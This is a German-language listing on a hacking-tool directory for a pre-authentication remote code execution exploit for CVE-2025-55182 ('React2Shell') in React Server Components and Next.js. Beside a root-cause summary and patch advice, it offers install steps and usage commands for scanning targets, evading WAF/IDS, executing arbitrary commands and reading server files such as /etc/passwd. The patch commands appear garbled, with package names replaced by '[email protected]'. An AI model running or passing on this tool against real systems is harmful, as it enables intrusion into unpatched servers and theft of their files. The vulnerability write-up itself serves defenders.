Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182 — Pre-Authentifizierungs-RCE-Exploit für CVE-2025-55182 (React2Shell), der auf React Server Components abzielt. Bietet Scanning, OAST-Verifikation, WAF-Umgehung, Befehlsausführung und Dateilesen. | Kitploit
Tools/GitHubGitHub/sentinelxofficial/cve-2025-55182
AufklärungSchwachstellenanalyseExploitationIDS/IPS-UmgehungWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHub
sentinelxofficial/cve-2025-55182

CVE-2025-55182

Pre-Authentifizierungs-RCE-Exploit für CVE-2025-55182 (React2Shell), der auf React Server Components abzielt. Bietet Scanning, OAST-Verifikation, WAF-Umgehung, Befehlsausführung und Dateilesen.

Repository anzeigen
1vor 2 MonatenNoch nicht geprüft
Teilen

CVE-2025-55182 — React2Shell

Pre-Authentifizierung Remote Code Execution in React Server Components (RSC), Next.js und verwandten Frameworks.

CVE CVSS Type Author


Übersicht

CVE-2025-55182 (auch bekannt als React2Shell) ist eine kritische Pre-Authentifizierung RCE-Schwachstelle, die das React Server Components (RSC) Ökosystem betrifft. Ein nicht authentifizierter Angreifer kann einen verwundbaren Server mit einer einzigen speziell präparierten HTTP-POST-Anfrage vollständig kompromittieren.

Technische Analyse

Grundursache

React Server Components verwendet ein benutzerdefiniertes Drahtformat namens React Flight zur Serialisierung von Funktionsreferenzen und Modulaufrufen. Die Schwachstelle existiert im Payload-Decoding-Mechanismus, der eingehende POST-Anfragen an RSC-Endpunkte verarbeitet.

Wenn der Server einen React Flight-Payload empfängt, deserialisiert er den Inhalt ohne ausreichende Validierung und vertraut dabei auf angreifergesteuerte $$typeof-Felder und Modulreferenzauflösung. Dies ermöglicht einem Angreifer:

  1. Beliebige Node.js-Built-in-Module referenzieren (z. B. child_process, fs, net)
  2. Funktionsaufrufe durch den $F (Funktion) Typmarker verketten
  3. Beliebigen Code unter der Node.js-Serverlaufzeit ausführen

Betroffene Versionen

CVSS

root@kitploit:~

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical


Funktionen

  • Scan – Erkenne verwundbare RSC-Endpunkte und identifiziere Next.js/React-Versionen.
  • Verify (OAST) – Sende Out-of-Band-Payloads zur Bestätigung von RCE über DNS/HTTP-Callbacks.
  • Bypass – Umfassende WAF/IDS-Umgehung: Content-Type-Mutationen, Payload-Kodierung, Header-Spoofing, Pfadvarianten und WAF-Payloads.
  • Execute – Führe beliebige Systembefehle auf dem Ziel aus (z. B. id, whoami).
  • Read – Lese beliebige Dateien vom Server (z. B. /etc/passwd, package.json).
  • JSON Output – Maschinenlesbare Ergebnisse für die Integration.

Installation

root@kitploit:~
git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt

Verwendung

Grundlegender Scan

root@kitploit:~
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json

RCE mit OAST verifizieren

root@kitploit:~
python3 poc.py -t https://target.com -m verify --oast your.oast.domain

Vollständiger Bypass-Test

root@kitploit:~
python3 poc.py -t https://target.com -m bypass --verbose

Befehle ausführen

root@kitploit:~
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20

Dateien lesen

root@kitploit:~
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"

Mit einem Proxy (z. B. Burp Suite)

root@kitploit:~
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080

Dateistruktur

root@kitploit:~
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
    ├── __init__.py
    ├── payloads.py
    ├── scanner.py
    ├── bypass.py
    └── rce.py

Gegenmaßnahmen

Patch (Empfohlen)

root@kitploit:~
npm install [email protected]
npm install [email protected] [email protected]

Temporäre Workarounds

· Deaktiviere Server Functions ("use server") · WAF-Regeln zum Blockieren von Content-Type: text/x-component · Netzwerksegmentierung für RSC-Endpunkte


Referenzen

· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182


Haftungsausschluss: Nur für autorisierte Sicherheitstests.

Autor: SentinelX · https://t.me/SentinelXsecurity

root@kitploit:~
Tool herunterladen
PaketVerwundbarGepatched
react-server-dom-webpack19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-parcel19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-turbopack19.0.0 – 19.2.0≥ 19.2.1
next (13.x)13.3.0 – 13.5.x≥ 14.2.35
next (14.x)14.0.0 – 14.2.34≥ 14.2.35
next (15.x)15.0.0+ (siehe Patch)gepatchte Versionen